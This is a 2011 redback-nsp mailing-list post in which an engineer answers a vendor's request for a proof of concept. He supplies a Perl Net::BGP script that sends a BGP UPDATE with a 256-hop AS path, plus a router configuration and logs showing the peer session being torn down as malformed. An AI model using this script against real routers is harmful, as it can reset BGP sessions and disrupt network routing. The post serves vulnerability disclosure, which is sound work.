[rbak-nsp] New old BGP issue.
Pawel Jarosz
pj at hostersi.pl
Sat Dec 3 01:44:43 EST 2011
On Fri, 2 Dec 2011, Jeff Tantsura wrote:
> Hi Pawel,
>
> SEOS has been treating this condition (AS path longer than 255) as withdraw
> since 2003.
> Could you please provide access to the PoC?
>
> Thanks!
Hi Jeff,
its' simple perl Net::BGP based script,
first install Net::BGP from CPAN.
Set up simple BGP session 9prefered in separate context),
in my environment between 10.0.0.1 (bgpd) and 10.0.0.1 (redback)
This behavior was analysed, such situation happened in 2008, and
same packets were generated form quagga.
Redback:
router bgp 65530
address-family ipv4 unicast
!
neighbor 10.0.0.2 external
remote-as 65531
address-family ipv4 unicast
Perl:
------------------------------------
#!/usr/bin/perl
#BGP Test daemon by Pawel Jarosz <pj at hostersi.pl>
use Net::BGP::Peer;
use Net::BGP::Update;
use Net::BGP::ASPath;
use Net::BGP::Process;
#Connect parameters
$LOCAL='10.11.0.254';
$LOCAL_AS=65531;
$REMOTE='10.0.0.1';
$REMOTE_AS='65530';
$peer = Net::BGP::Peer->new(
Start => 1,
ThisID => $LOCAL,
ThisAS => $LOCAL_AS,
PeerID => $REMOTE,
PeerAS => $REMOTE_AS,
Listen => 0,
Passive => 0,
);
sub sec_update_timer {
$update = Net::BGP::Update->new(
NLRI => [ qw( 1.1.1.1/24 ) ],
# For Net::BGP::NLRI
Aggregator => [ $LOCAL_AS, $LOCAL ],
#Oversized as-path goes here...
AsPath => Net::BGP::ASPath->new("$LOCAL_AS "x256),
AtomicAggregate => 1,
# Communities => [ qw( 64512:10000 64512:10001 ) ],
# LocalPref => 100,
# MED => 200,
NextHop => $LOCAL,
Origin => INCOMPLETE,
);
$peer=shift;
$estab = $peer->is_established();
print "Established: $estab\n";
if (!$estab) {
$peer->start();
return;
}
print "Sending update...\n";
$peer->update($update);
}
$bgp = Net::BGP::Process->new();
$bgp->add_peer($peer);
$peer->start();
$peer->add_timer(\&sec_update_timer, 5);
print "Starting loop...\n";
$bgp->event_loop();
print "Done...\n";
-------------------------------------------------
Start the script.
In my logs:
Dec 2 11:21:48 10.0.0.1 Dec 2 10:21:48.239: [0001]: %BGP-7-UPDATE: 10.0.0.2 rcv UPDATE, 549 bytes
Dec 2 11:21:48 10.0.0.1 Dec 2 10:21:48.239: [0001]: %BGP-7-UPDATE: 10.0.0.2 rcv invalid as path segment length 0
Dec 2 11:21:48 10.0.0.1 Dec 2 10:21:48.239: [0001]: %BGP-7-UPDATE: 10.0.0.2 malformed aspath, 514 bytes - aspath dump
Dec 2 11:21:48 10.0.0.1
Dec 2 11:21:48 10.0.0.1 0 02 00 ff fb ff fb ff fb ff fb ff fb ff fb ff fb
Dec 2 11:21:48 10.0.0.1 16 ff fb ff fb ff fb ff fb ff fb ff fb ff fb ff fb
Dec 2 11:21:48 10.0.0.1 32 ff fb ff fb ff fb ff fb ff fb ff fb ff fb ff fb
Dec 2 11:21:48 10.0.0.1 48 ff fb ff fb ff fb ff fb ff fb ff fb ff fb ff fb
Dec 2 11:21:48 10.0.0.1 64 ff fb ff fb ff fb ff fb ff fb ff fb ff fb ff fb
Dec 2 11:21:48 10.0.0.1 80 ff fb ff fb ff fb ff fb ff fb ff fb ff fb ff fb
Dec 2 11:21:48 10.0.0.1 96 ff fb ff fb ff fb ff fb ff fb ff fb ff fb ff fb
Dec 2 11:21:48 10.0.0.1 112 ff fb ff fb ff fb ff fb ff fb ff fb ff fb ff fb
Dec 2 11:21:48 10.0.0.1 128 ff fb ff fb ff fb ff fb ff fb ff fb ff fb ff fb
Dec 2 11:21:48 10.0.0.1 144 ff fb ff fb ff fb ff fb ff fb ff fb ff fb ff fb
Dec 2 11:21:48 10.0.0.1 160 ff fb ff fb ff fb ff fb ff fb ff fb ff fb ff fb
Dec 2 11:21:48 10.0.0.1 176 ff fb ff fb ff fb ff fb ff fb ff fb ff fb ff fb
Dec 2 11:21:48 10.0.0.1 192 ff fb ff fb ff fb ff fb ff fb ff fb ff fb ff fb
Dec 2 11:21:48 10.0.0.1 208 ff fb ff fb ff fb ff fb ff fb ff fb ff fb ff fb
Dec 2 11:21:48 10.0.0.1 224 ff fb ff fb ff fb ff fb ff fb ff fb ff fb ff fb
Dec 2 11:21:48 10.0.0.1 240 ff fb ff fb ff fb ff fb ff fb ff fb ff fb ff fb
Dec 2 11:21:48 10.0.0.1 256 ff fb ff fb ff fb ff fb ff fb ff fb ff fb ff fb
Dec 2 11:21:48 10.0.0.1 272 ff fb ff fb ff fb ff fb ff fb ff fb ff fb ff fb
Dec 2 11:21:48 10.0.0.1 288 ff fb ff fb ff fb ff fb ff fb ff fb ff fb ff fb
Dec 2 11:21:48 10.0.0.1 304 ff fb ff fb ff fb ff fb ff fb ff fb ff fb ff fb
Dec 2 11:21:48 10.0.0.1 320 ff fb ff fb ff fb ff fb ff fb ff fb ff fb ff fb
Dec 2 11:21:48 10.0.0.1 336 ff fb ff fb ff fb ff fb ff fb ff fb ff fb ff fb
Dec 2 11:21:48 10.0.0.1 352 ff fb ff fb ff fb ff fb ff fb ff fb ff fb ff fb
Dec 2 11:21:48 10.0.0.1 368 ff fb ff fb ff fb ff fb ff fb ff fb ff fb ff fb
Dec 2 11:21:48 10.0.0.1 384 ff fb ff fb ff fb ff fb ff fb ff fb ff fb ff fb
Dec 2 11:21:48 10.0.0.1 400 ff fb ff fb ff fb ff fb ff fb ff fb ff fb ff fb
Dec 2 11:21:48 10.0.0.1 416 ff fb ff fb ff fb ff fb ff fb ff fb ff fb ff fb
Dec 2 11:21:48 10.0.0.1 432 ff fb ff fb ff fb ff fb ff fb ff fb ff fb ff fb
Dec 2 11:21:48 10.0.0.1 448 ff fb ff fb ff fb ff fb ff fb ff fb ff fb ff fb
Dec 2 11:21:48 10.0.0.1 464 ff fb ff fb ff fb ff fb ff fb ff fb ff fb ff fb
Dec 2 11:21:48 10.0.0.1 480 ff fb ff fb ff fb ff fb ff fb ff fb ff fb ff fb
Dec 2 11:21:48 10.0.0.1 496 ff fb ff fb ff fb ff fb ff fb ff fb ff fb ff fb
Dec 2 11:21:48 10.0.0.1 512 ff fb
Dec 2 11:21:48 10.0.0.1
Dec 2 11:21:48 10.0.0.1 Dec 2 10:21:48.240: [0001]: %BGP-6-INFO: 10.0.0.2 DOWN - Notification sent
Dec 2 11:21:48 10.0.0.1 Dec 2 10:21:48.240: [0001]: %BGP-6-INFO: 10.0.0.2 send NOTIFICATION: 3/11 (update: malformed ASPATH) with 518 byte data. mxReadMs=5016
Regards,
Pawel
--
Pawel Jarosz (PJ2179-RIPE)
Hostersi, Rybnik, Dworek 23, tel. 0 801 000 601
e-mail: pj at hostersi.pl, http://www.hostersi.pl/
More information about the redback-nsp
mailing list